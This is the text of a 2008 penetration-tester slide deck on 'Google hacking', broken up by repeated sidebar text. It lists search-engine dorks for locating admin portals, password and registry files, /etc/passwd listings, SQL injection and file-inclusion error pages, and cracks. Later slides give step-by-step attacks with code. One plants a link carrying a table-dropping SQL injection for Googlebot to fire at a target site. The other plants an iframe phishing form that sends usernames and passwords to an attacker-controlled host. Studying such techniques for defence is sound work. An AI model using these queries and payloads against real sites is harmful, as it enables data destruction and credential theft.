1. Dirty Attacks with Google Hacking
Prathan Phongthiproek
ACIS Professional Center
Information Security Consultant – Penetration Tester
November 16th, 2008
2. Dirty Attacks
With
Google hacking
What I’ve done ?!
Penetration Testing (BlackBox and WhiteBox)
What is Google
Hacking?
What a Hacker Can do
Security Consultant ( I Hate this job !!)
with vulnerable Web?
Google Hacking Active Security Researcher
Database (GHDB)
--------------------------------
Google Hacking
Devoted Hacker
basics
Google Advanced Exploits and Vulnerabilities Disclosure
Operators
--------------------------------
(CWH Underground)
Locating Exploits and
Finding Targets Tools: g00mail Enumerator, SQLFuzzer, 4ppCrawl3r, Spike
Tracking Down Web Bot (Developing) Etc..
Servers, Login
Portals, etc..
Dirty Attacks using Comments, Feedback ? >> prathan.ptr@gmail.com !
Googlebot (Don’t spam mail !! lol)!
Google Hacking Tools
-------------------------------- #w
03:19:18 up 1 min, 1 user, load average: 1.73, 0.71, 0.26
USER TTY FROM LOGIN@ IDLE JCPU PCPU
prathan phongthiproek tty1 - 03:18 0.00s 0.08s 0.01s
3. Dirty Attacks
With
Google hacking
What is Google Hacking ?!
It is NOT hacking into Google!!
What is Google (Hacking Google: Sidejacking, XSS Spreadsheet, etc)
Hacking? Google is much more than just a simple search
What a Hacker Can do
with vulnerable Web?
interface and engine.
Google Hacking Google hacking is the use of a search engine to locate a security vulnerability on the
Database (GHDB) Internet
--------------------------------
Google crawls public websites for information using
Google Hacking
basics
an automated search and record program called
Google Advanced
“Googlebot”.
Operators IRC Bot using Google Hacking to find Vulnerability
-------------------------------- and Exploits
Locating Exploits and
Finding Targets
Refers to using the Google search engine in an effort to pull sensitive information, such
Tracking Down Web
as credit card numbers, out of a poorly constructed Web application !
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
4. Dirty Attacks
With
Google hacking
What is Google Hacking ?!
Johnny Long is the “grandfather” of Google hacking.
What is Google His website http://johnny.ihackstuff.com is exclusively
Hacking?
dedicated to Google Hacking and you will find all sorts
What a Hacker Can do
with vulnerable Web? of cool information there.
Google Hacking Johnny Long
Database (GHDB)
• Wrote Google Hacking for Penetration Testers; ISBN
-------------------------------- 1597491764
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
5. What a Hacker Can do with
Dirty Attacks
With
Google hacking Vulnerable Web ?!
When an attacker knows the sort of vulnerability he !
What is Google
Hacking? wants to exploit but has no specific target,
The
Best
Solu-on
is
“Dirty
Google
What a Hacker
Search
operators”
Can do with
vulnerable Web? File Inclusion (RFI, LFI)
Google Hacking
Database (GHDB) SQL Injection
-------------------------------- Remote Code Execution
Google Hacking
basics
Arbitrary Add Admin
Google Advanced Arbitrary File Upload
Operators
XSS / XSRF
--------------------------------
Locating Exploits and
Directory Listing
Finding Targets Directory Traversal
Tracking Down Web
Servers, Login
Source code disclosure
Portals, etc.. Administrative Login Portals
Dirty Attacks using
Googlebot
Web server Information
Google Hacking Tools Reveal Pathnames and Filenames
-------------------------------- Social Engineering (Damn !! How do you get my address)
6. Dirty Attacks
With
Google hacking
Google Hacking Database (GHDB)!
We call them “googledorks”
:
Inept or foolish people as revealed by Google.
What is Google
Hacking?
What a Hacker Can do Advisories and Vulnerabilities
with vulnerable Web?
Error Messages that contain too much information
Google Hacking
Database (GHDB) Files containing usernames and passwords
-------------------------------- Footholds and juicy Info
Google Hacking Pages containing login portals
basics
Google Advanced
Pages containing network or vulnerability data
Operators Sensitive Directories
--------------------------------
Sensitive Online Shopping Info
Locating Exploits and
Finding Targets Vulnerable Files and Servers
Tracking Down Web Web Server Detection
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
7. Dirty Attacks
With
Google hacking
Google Hacking Database (GHDB)!
h;p://johnny.ihackstuff.com/ghdb.php.
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
8. Dirty Attacks
With
Google hacking
Google Hacking Database (GHDB)!
Pages
containing
login
portals
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
9. Dirty Attacks
With
Google hacking
Google Hacking Database (GHDB)!
in-tle:"ColdFusion
Administrator
Login"
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
10. Dirty Attacks
With
Google hacking
Google Hacking Database (GHDB)!
“ColdFusion
Administrator
Login"
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
11. Dirty Attacks
With
Google hacking
Google Hacking basics!
Crawl
Website
Informa-on
with
Caches
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
12. Dirty Attacks
With
Google hacking
Google Hacking basics!
Using
Google
as
a
Proxy
Server
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
13. Dirty Attacks
With
Google hacking
Google Hacking basics!
Basic
Search
Operators
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Use the plus sign (+) to force a search for an overly
Google Hacking
Database (GHDB)
common word
-------------------------------- Use the minus sign (-) to exclude a term from a
Google Hacking
search
basics (|) / OR, admin | administrator
Google Advanced To search for a phrase, supply the phrase
Operators
surrounded by double quotes (" ")
--------------------------------
Locating Exploits and
A period (.) serves as a single-character wildcard.
Finding Targets An asterisk (*) represents any word - not the
Tracking Down Web completion of a word, as is traditionally used
Servers, Login
Portals, etc.. Mixed searches, Can involve both phrases and
Dirty Attacks using individual terms
Googlebot
Google Hacking Tools
--------------------------------
14. Dirty Attacks
With
Google hacking
Google Advanced Operators!
Advanced
Search
Operators
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
filetype:
Google Hacking
Database (GHDB) info:
-------------------------------- define:
Google Hacking
basics
intext:
Google
inurl:
Advanced intitle:
Operators inanchor:
--------------------------------
Locating Exploits and
link:
Finding Targets site:
Tracking Down Web
Servers, Login
stocks:
Portals, etc.. cache:
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
15. Dirty Attacks
With
Google hacking
Google Advanced Operators!
Website
Informa-on
Gathering
–
“site:www.amazon.com”
!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
16. Dirty Attacks
With
Google hacking
Google Advanced Operators!
Subdomains
Gathering
–
“site:amazon.com
What is Google –site:www.amazon.com”
!
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
17. Dirty Attacks
With
Google hacking
Google Advanced Operators!
Website
containing
Error
Message
–
“Error
|
Warning
site:…”
!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
18. Dirty Attacks
With
Google hacking
Google Advanced Operators!
Directory
Lis-ng
–
in-tle:index.of
admin
!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
19. Dirty Attacks
With
Google hacking
Google Advanced Operators!
Directory
Lis-ng
–
in-tle:index.of
WS_FTP.LOG
!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
20. Dirty Attacks
With
Google hacking
Google Advanced Operators!
Web
server
Informa-on
–
in-tle:index.of
“Server
at”
!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
21. Dirty Attacks
With
Google hacking
Google Advanced Operators!
Administra-ve
Login
Portals
–
“admin
login”
!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
22. Dirty Attacks
With
Google hacking
Google Advanced Operators!
File
robots.txt
–
“inurl:robots.txt”
!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
23. Dirty Attacks
With
Google hacking
Google Advanced Operators!
Vulnerable
File
(Robpoll.cgi)
–
“inurl:robpoll.cgi filetype:cgi” !
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
24. Dirty Attacks
With
Google hacking
Google Advanced Operators!
File
containing
password
–
“AutoCreate=TRUE
password=*”!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
25. Dirty Attacks
With
Google hacking
Google Advanced Operators!
What is Google
MS
Access
DB
password
–
“inurl:admin
mdb”!
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
26. Dirty Attacks
With
Google hacking
Google Advanced Operators!
What is Google
MS
Access
DB
password
–
“inurl:admin
mdb”!
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
27. Dirty Attacks
With
Google hacking
Google Advanced Operators!
What is Google
Password
File
–
“index
of
/etc"
passwd!
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
28. Dirty Attacks
With
Google hacking
Google Advanced Operators!
What is Google
Crack
/
Keygen…
–
94FBR
sobware!
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
29. Dirty Attacks
With
Google hacking
Locating Exploits and Finding Targets!
Loca-ng
Exploits
Via
Common
Code
Strings
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Another way to locate exploit code is to focus on
Google Hacking
Database (GHDB)
common strings within the source code itself
-------------------------------- One way to do this is to focus on common inclusions
Google Hacking or header file references
basics
For Example, many C programs include the standard
Google Advanced
Operators
input/output library functions, which are references by
--------------------------------
an include statement such as #include <stdio.h>
within the source code
Locating Exploits
and Finding A query like this would locate C source code that
Targets contained the word exploit, regardless of the file’s
Tracking Down Web extension:
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
“#include
<stdio.h>”
exploit
Google Hacking Tools
--------------------------------
30. Dirty Attacks
With
Google hacking
Locating Exploits and Finding Targets!
Loca-ng
Exploits
Via
Common
Code
Strings
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits
and Finding
Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
31. Dirty Attacks
With
Google hacking
Locating Exploits and Finding Targets!
Loca-ng
Exploits
Via
Common
Code
Strings
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits
and Finding
Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
32. Dirty Attacks
With
Google hacking
Locating Exploits and Finding Targets!
Loca-ng
Targets
Via
Demonstra-on
Pages
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Develop a query string to locate vulnerable targets on
Google Hacking
Database (GHDB)
the Web; the vendor’s Website is a good place to
--------------------------------
discover what exactly the product’s Web pages look
Google Hacking
like
basics For Example, some administrators might modify the
Google Advanced format of a vendor-supplied Web page to fit the
Operators
theme of the site
--------------------------------
These types of modifications can impact the
Locating Exploits effectiveness of a Google search that targets a
and Finding
Targets
vendor-supplied page format
Tracking Down Web You can find that most sites look very similar and that
Servers, Login nearly every site has a “Powered by” message at the
Portals, etc..
bottom of the main page
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
33. Dirty Attacks
With
Google hacking
Locating Exploits and Finding Targets!
Loca-ng
Targets
Via
Source
Code
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
A hacker might use the source code of a program to
Google Hacking
Database (GHDB)
discover ways to search for that software with Google
-------------------------------- To find the best search string to locate potentially
Google Hacking vulnerable targets, you can visit the Web page of the
basics software vendor to find the source code of the
Google Advanced offending software
Operators
--------------------------------
In case where source code is not available, an
attacker might opt to simply download the offending
Locating Exploits software and run it on a machine he controls to get
and Finding
Targets
ideas for potential searches
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
34. Dirty Attacks
With
Google hacking
Locating Exploits and Finding Targets!
Vulnerable
Web
Applica-on
Examples!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits
and Finding
Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
35. Dirty Attacks
With
Google hacking
Locating Exploits and Finding Targets!
Vulnerable
Web
Applica-on
Examples!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits
and Finding
Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
36. Dirty Attacks
With
Google hacking
Locating Exploits and Finding Targets!
Finding
targets
via
“powered
by”
–
“Powered
By
cubecart”
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits
and Finding
Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
37. Tracking Down Web Servers, Log
Dirty Attacks
With
Google hacking Portals, etc..!
Query
for
“Microsob-‐IIS/5.0
Server
at” !
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
38. Tracking Down Web Servers, Log
Dirty Attacks
With
Google hacking Portals, etc..!
IIS
HTTP/1.1
Error
Page
Titles!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
39. Tracking Down Web Servers, Log
Dirty Attacks
With
Google hacking Portals, etc..!
Query
for
IIS
5.0
–
intext:“404
Object
Not
Found”
Microsob
What is Google
Hacking?
IIS/5.0!
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
40. Tracking Down Web Servers, Log
Dirty Attacks
With
Google hacking Portals, etc..!
Query
for
“Apache”
“Server
at”
–in-tle:index.of
in-tle:error
!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
41. Tracking Down Web Servers, Log
Dirty Attacks
With
Google hacking Portals, etc..!
Apache
2.0
Error
Pages!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
42. Tracking Down Web Servers, Log
Dirty Attacks
With
Google hacking Portals, etc..!
Default
Pages
for
Web
Servers!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
43. Tracking Down Web Servers, Log
Dirty Attacks
With
Google hacking Portals, etc..!
Outlook
Web
Access
Default
Portal
–
inurl:“exchange/
What is Google
Hacking?
logon.asp”!
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
44. Tracking Down Web Servers, Log
Dirty Attacks
With
Google hacking Portals, etc..!
Windows
Registry
Entries
Can
Reveal
Passwords
–
filetype:reg
What is Google
Hacking?
intext:"internet
account
manager"!
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
45. Tracking Down Web Servers, Log
Dirty Attacks
With
Google hacking Portals, etc..!
Error
Message
for
File
Inclusion
–
“Warning:
Failed
opening"
!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
46. Tracking Down Web Servers, Log
Dirty Attacks
With
Google hacking Portals, etc..!
Error
Message
for
File
Inclusion
–
“Warning:
Failed
opening"
!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
47. Tracking Down Web Servers, Log
Dirty Attacks
With
Google hacking Portals, etc..!
Error
Message
for
SQL
Injec-on
–
“Microsob
OLE
DB
Provider
What is Google
Hacking?
for
ODBC
Drivers
error”
!
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
48. Tracking Down Web Servers, Log
Dirty Attacks
With
Google hacking Portals, etc..!
Error
Message
for
SQL
Injec-on
–
“Microsob
OLE
DB
Provider
What is Google
Hacking?
for
ODBC
Drivers
error”
!
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
49. Tracking Down Web Servers, Log
Dirty Attacks
With
Google hacking Portals, etc..!
Error
Message
for
XSS/XSRF
–
inurl:“error.asp?msg=”!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
50. Dirty Attacks
With
Google hacking
Dirty Attacks using Googlebot!
What is Google
Googlebot,
Google’s
Web
Crawler!
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
<a href=http://www.mict.go.th>MICT</a>
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks
using Googlebot
Google Hacking Tools
--------------------------------
51. Dirty Attacks
With
Google hacking
Dirty Attacks using Googlebot!
Google’s
Query
Processor!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks
using Googlebot
Google Hacking Tools
--------------------------------
52. Dirty Attacks
With
Google hacking
Dirty Attacks using Googlebot!
SQL
Injec-on
via
Googlebot
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
We search in Google one of signatures:
Database (GHDB)
inurl:”.asp?id=“,inurl:”?name=“,”Microsoft OLE
--------------------------------
Google Hacking
DB Provider for SQL Server”
basics
Finding the link:
Google Advanced
Operators http://www.hackme.com/cat.asp?ID=1
--------------------------------
Locating Exploits and
Create the file test.html the code is:
Finding Targets
<html>
Tracking Down Web
Servers, Login <a href=“http://www.hackme.com/cat.asp?
Portals, etc..
ID=1+drop+table+’users’—”>Click Here</a>
Dirty Attacks
using Googlebot </html>
Google Hacking Tools
--------------------------------
53. Dirty Attacks
With
Google hacking
Dirty Attacks using Googlebot!
SQL
Injec-on
via
Googlebot
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Then upload to:
Database (GHDB)
http://www.mysite.com/test.html
--------------------------------
Google Hacking After a few days GoogleBot will index the file:
basics
Google Advanced
http://www.mysite.com/test.html
Operators
Then index the link “Click Here” inside the file:
--------------------------------
Locating Exploits and http://www.hackme.com/cat.asp?ID=1+drop+table
Finding Targets
+’users’—
Tracking Down Web
Servers, Login The application SQL query is:
Portals, etc..
Dirty Attacks SELECT Username FROM users WHERE ID=1
using Googlebot drop table ‘users’—
Google Hacking Tools
--------------------------------
The Result: The table “users” has been deleted,
thanks to Google
54. Dirty Attacks
With
Google hacking
Dirty Attacks using Googlebot!
Google’s
Query
Processor!
<a href=“http://
What is Google
Hacking?
www.hackeme.co
m/cat.asp?
What a Hacker Can do
with vulnerable Web?
ID=1+drop+table
+’users’—”>Click
Google Hacking
Database (GHDB)
Here</a>
--------------------------------
Google Hacking
basics <a href=“http://
Google Advanced www.hackeme.co
Operators m/cat.asp?
-------------------------------- ID=1+drop+table
Locating Exploits and +’users’—”>Click
Finding Targets Here</a>
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks
using Googlebot
Google Hacking Tools
/cat.asp?ID=1+drop
-------------------------------- +table+’users’—
55. Dirty Attacks
With
Google hacking
Dirty Attacks using Googlebot!
Cross
Site
Framing
via
Googlebot
What is Google
Hacking?
What a Hacker Can do We search in Google one of signatures:
with vulnerable Web?
inurl:”.asp?msg=“,inurl:”.asp?title=“,..
Google Hacking
Database (GHDB) We find the link:
--------------------------------
http://www.CITEC.com/bank/Login.asp?MsgError=Access
Google Hacking
basics denied
Google Advanced Create the file 1.html the code is:
Operators
-------------------------------- <html>
Locating Exploits and <title>CITEC Bank | Login CITEC | CITEC Account</
Finding Targets
title>
Tracking Down Web
Servers, Login <a href=“http://www.CITEC.com/bank/Login.asp?
Portals, etc..
MsgError=<iframe src=‘http://www.social.com/
Dirty Attacks
using Googlebot
2.html’></iframe>”>CITEC Bank</a>
Google Hacking Tools </html>
--------------------------------
56. Dirty Attacks
With
Google hacking
Dirty Attacks using Googlebot!
Cross
Site
Framing
via
Googlebot
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
And the file 2.html
Google Hacking <form method=“post” action=“http://
Database (GHDB)
www.social.com/1.php>
--------------------------------
Google Hacking Username: <input type=“text” name=“user”><br>
basics
Password: <input type=“password” name=“pass”>
Google Advanced
Operators <input type=“submit” value=“Send”>
--------------------------------
</form>
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login Then upload All The Files to:
Portals, etc..
http://www.social.com/
Dirty Attacks
using Googlebot
Google Hacking Tools
--------------------------------
57. Dirty Attacks
With
Google hacking
Dirty Attacks using Googlebot!
Cross
Site
Framing
via
Googlebot
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web? After a few days GoogleBot will index the file:
Google Hacking
Database (GHDB)
http://www.social.com/1.html
--------------------------------
Google Hacking
basics
Then will index the link “CITEC Bank”(that
Google Advanced within the file):
Operators
http://www.CITEC.com/bank/Login.asp?
--------------------------------
Locating Exploits and
MsgError=<iframe src=‘http://www.social.com/2.html’></
Finding Targets iframe>
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks
using Googlebot
Google Hacking Tools
--------------------------------
58. Dirty Attacks
With
Google hacking
Dirty Attacks using Googlebot!
Cross
Site
Framing
via
Googlebot
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web? The users that search “CITEC Bank” will find
Google Hacking the above link and when getting inside the link
Database (GHDB)
--------------------------------
they will see this form:
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks
using Googlebot
Google Hacking Tools
The Result: Many Users are being Manipulated by the
--------------------------------
attacker which uses Google in order to execute a Phishing
attack (with XSS).
59. Dirty Attacks
With
Google hacking
Google Hacking Tools!
What is Google Google
Hacking
Database
(GHDB)!
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking
Tools
--------------------------------
60. Dirty Attacks
With
Google hacking
Google Hacking Tools!
What is Google Gooscan!
Hacking?
What a Hacker Can do
